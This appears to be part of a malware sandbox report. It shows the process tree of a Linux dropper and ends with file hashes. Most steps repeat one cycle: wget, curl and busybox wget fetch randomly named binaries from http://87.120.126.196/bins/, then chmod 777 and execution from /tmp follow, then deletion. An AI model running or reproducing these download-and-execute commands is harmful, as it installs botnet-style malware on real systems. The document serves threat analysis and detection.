/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:938
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:944
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:950
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:956
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:962
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:968
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:974
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97